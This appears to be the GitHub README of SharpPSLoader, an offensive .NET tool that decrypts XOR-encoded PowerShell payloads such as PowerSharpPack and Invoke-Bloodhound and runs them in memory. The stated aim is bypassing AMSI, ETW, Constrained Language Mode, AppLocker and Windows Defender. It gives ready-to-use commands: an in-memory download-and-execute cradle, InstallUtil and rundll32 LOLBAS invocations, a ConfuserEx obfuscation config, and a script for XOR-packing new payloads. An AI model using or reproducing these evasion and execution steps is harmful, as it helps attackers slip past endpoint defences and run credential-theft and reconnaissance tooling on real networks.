
Simple .NET loader for loading and executing Powershell payloads

Primary LanguageC#


SharpPSLoader is a loader for PowerSharpPack and other powershell scripts, designed to bypass AMSI, Constrained Language Mode (CLM), Applocker, and Windows Defender using the PowerPick technique and LOLBAS binaries.

SharpPSLoader works like this:

  1. Decrypt single-byte encrypted powershell payload (currently PowerSharpPack & Invoke-Bloodhound) from its resources section
  2. Bypass AMSI and ETW
  3. Create custom Powershell runspace and load #1 in-memory
  4. Invoke #1 powershell payload with user argument

For detailed usage, refer to the Usage section below.


All credits goes to @S3cur3Th1sSh1t, @Jean_Maes_1994, @xpn, @3xpl01tc0d3r, @mariuszbit/mgeeky, OSEP, and other researchers in the field. I just copy/pasted their code & added couple lines of code and that's all.


SharpPSLoader can be executed on-disk, in-memory, through InstallUtils.exe, and through rundll32.exe.



SharpPSLoaderConsole and SharpPSLoaderLibrary can be executed with the following syntax:

./SharpPSLoaderConsole <payload#> <powershell_function & arguments>
ex) ./SharpPSLoaderConsole 1 powersharppack -rubeus -command "triage"

Current list of payloads:

1 = PowerSharpPack 
2 = Invoke-Bloodhound 

SharpPSLoaderConsole - on-disk console

(new-object net.webclient).downloadfile("","c:\users\low\SharpPSLoaderConsole.exe")
.\SharpPSLoaderConsole.exe 1 powersharppack -seatbelt -command "-group=user"

SharpPSLoaderConsole - in-memory

$b = (New-Object net.webclient).DownloadData("")
[SharpPSLoaderConsole.SharpPSLoaderConsole]::Main(@("1","Powersharppack -sharpup audit"))

[SharpPSLoaderConsole.SharpPSLoaderConsole]::Main(@("2","Invoke-Bloodhound -c All"))

SharpPSLoaderConsole - LOLBAS - InstallUtils.exe, on-disk

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="<payload#> <powershell_function & argument>" /U .\SharpPSLoaderConsole.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="1 PowerSharpPack -seatbelt -Command '-group=user'" /U .\SharpPSLoaderConsole.exe

SharpPSLoaderLibrary - LOLBAS - rundll32.exe, on-disk

(64bit) c:\windows\system32\rundll32.exe SharpPSLoaderLibrary.dll,runLibrary 1 powersharppack -seatbelt -command -group=user 

(32bit)) C:\Windows\SysWOW64\rundll32.exe SharpPSLoaderLibrary.dll,runLibrary 1 powersharppack -seatbelt -command -group=user

Usage - Powershell Payloads

For detailed usage of PowerSharpPack and Invoke-Bloodhound, refer to the References section down below.

Obfuscation - Warning

If you want to obfuscate the assembly with confuserEx and execute it in-memory, use the SharpPSLoader-confuser.crproj configuration file as a template. The configuration file's rules were specifically built to not scramble assembly types and not include compressor so the assembly can be executed in-memory. If you know what you are doing, you do you.

<project outputDir="<output-directory>" baseDir="<base-directory>" xmlns="http://confuser.codeplex.com">
  <module path="SharpPSLoaderConsole.exe">
    <rule pattern="true" preset="normal" inherit="false">
      <protection id="resources" />
      <protection id="rename" action="remove" />
      <protection id="typescramble" action="remove" />
      <protection id="constants" />
      <protection id="ctrl flow" />

Adding Powershell Payloads

Currently, the powershell payloads are encrypted with single-byte XOR bytes with a hardcode key of "111".

The following powershell script can be used to create a xor encrypted powershell payload.

function Invoke-SingleByteXOR{
	param($filepath, $key)

    $xorKey = [System.Convert]::ToByte($key)
	$byteString = [System.IO.File]::ReadAllBytes($filepath)

    $xorData = $(for($i=0; $i -lt $byteString.length; $i++){
        $byteString[$i] = $byteString[$i] -bxor $xorKey

    Set-Content $($filepath+".xor") -Value $byteString -Encoding Byte

ps> Invoke-SingleByteXOR c:\dev\powerview.ps1 111 

Add the xor'ed payload through Project right click > Properties > Resources > drag/drop the payload.

Then, edit the switch statement in DecryptedPSFromRsrcDict function.

References & Credits